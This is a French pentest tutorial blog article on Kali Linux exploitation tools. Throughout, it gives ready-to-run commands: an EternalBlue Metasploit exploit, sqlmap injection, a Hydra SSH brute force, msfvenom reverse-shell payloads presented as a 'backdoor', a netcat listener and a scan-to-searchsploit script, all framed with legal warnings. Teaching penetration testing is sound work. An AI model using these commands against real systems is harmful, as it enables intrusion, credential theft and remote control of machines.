🧠 Article 3 — Kali : Exploitation : les jouets qui font peur aux RSSI

“J’ai trouvé une faille” – Phrase qui fait suer 97% des DSI et 100% des juristes.

On y est. Après avoir scanné, exploré et flairé comme un renard numérique, vient le moment du grand frisson : l’exploitation. Cette phase du pentest vise à tirer profit d’une vulnérabilité pour obtenir un accès, exécuter du code, ou déclencher une compromission. En clair ? On entre.


🚨 Avertissement légal express (encore)

Oui, c’est excitant. Oui, ça donne un petit pouvoir.
Non, tu ne fais pas ça chez ton ex ou sur le Wi-Fi du voisin.

L’exploitation sans autorisation explicite = illégal = tribunal = amende = “vous avez quelque chose à déclarer, monsieur ?”.


🧰 Les outils d’exploitation indispensables sur Kali

🧨 1. Metasploit Framework

LE framework d’exploitation. Modules prêts à l’emploi, interface CLI ou web (msfconsole ou msfvenom).

bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

Tu viens (peut-être) de compromettre une machine Windows vulnérable à EternalBlue. Bien joué, 2017.

🧨 2. Searchsploit

Interface locale de la base de données Exploit-DB. Rapide, offline, pratique.

bash
searchsploit apache 2.4.49

Pro tip : tu peux coupler ça à un copier-coller du PoC dans Kali directement.

🧨 3. sqlmap

Automatise les injections SQL. Ça scanne, ça extrait, et parfois… ça te donne un shell.

bash
sqlmap -u "http://site.com/page.php?id=3" --dbs

Ajoute --risk=3 --level=5 si tu veux vraiment jouer avec le feu.

🧨 4. Hydra

Brute force à gogo : SSH, FTP, HTTP, RDP, etc.

bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

N’oublie pas de limiter les tentatives pour ne pas te faire bannir en 3 secondes.

🧨 5. Nikto

Scan de vulnérabilités web. Très bruyant, mais rapide à dégainer.

bash
nikto -h http://target.local

⚙️ Mini-pipeline d’exploitation automatisé (scan > exploit)

Voici un script rudimentaire bash pour faire un enchaînement simple :

bash
#!/bin/bash

TARGET=$1
if [ -z "$TARGET" ]; then
echo "Usage: $0 <IP cible>"
exit 1
fi

echo "[+] Scan de ports..."
nmap -sS -sV -p- $TARGET -oN portscan.txt

echo "[+] Recherche de vulnérabilités..."
grep -E "open.*(http|ftp|ssh|smb|mysql)" portscan.txt | while read line; do
service=$(echo $line | awk '{print $3}')
port=$(echo $line | awk '{print $1}' | cut -d '/' -f 1)
echo "Recherche sur $service (port $port)..."
searchsploit $service
done

Tu ne vas pas lancer d’exploit tout de suite, mais tu prépares le terrain… et c’est la base.


🪛 Et pour les fans de Metasploit : un générateur de payload

bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

Couple ça avec un listener multi/handler et t’es prêt pour du post-exploitation.


🧨 Bonus : créer une backdoor… éthique

bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf
chmod +x shell.elf

Puis côté écoute :

bash
nc -lvnp 4444

Utilise ça uniquement dans un cadre légal et sur des systèmes autorisés. Pas sur le NAS du bureau.


🧯 En résumé

L’exploitation, c’est le feu d’artifice du pentest. Mais pour que ça ne tourne pas au carnage, il faut de la méthode, de la préparation, et du sang-froid. Et surtout, savoir quoi faire une fois dedans (c’est justement le sujet du prochain article).


Prochain arrêt : Post-Exploitation et persistance, ou l’art de rester discret tout en récoltant le max d’infos. On y parlera de Mimikatz, BloodHound, PowerShell, et autres joyeusetés.

🧠 Article 3 — Kali : Exploitation : les jouets qui font peur aux RSSI
Partager cet article : Twitter LinkedIn WhatsApp

🖋️ Publié sur SecuSlice.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Retour en haut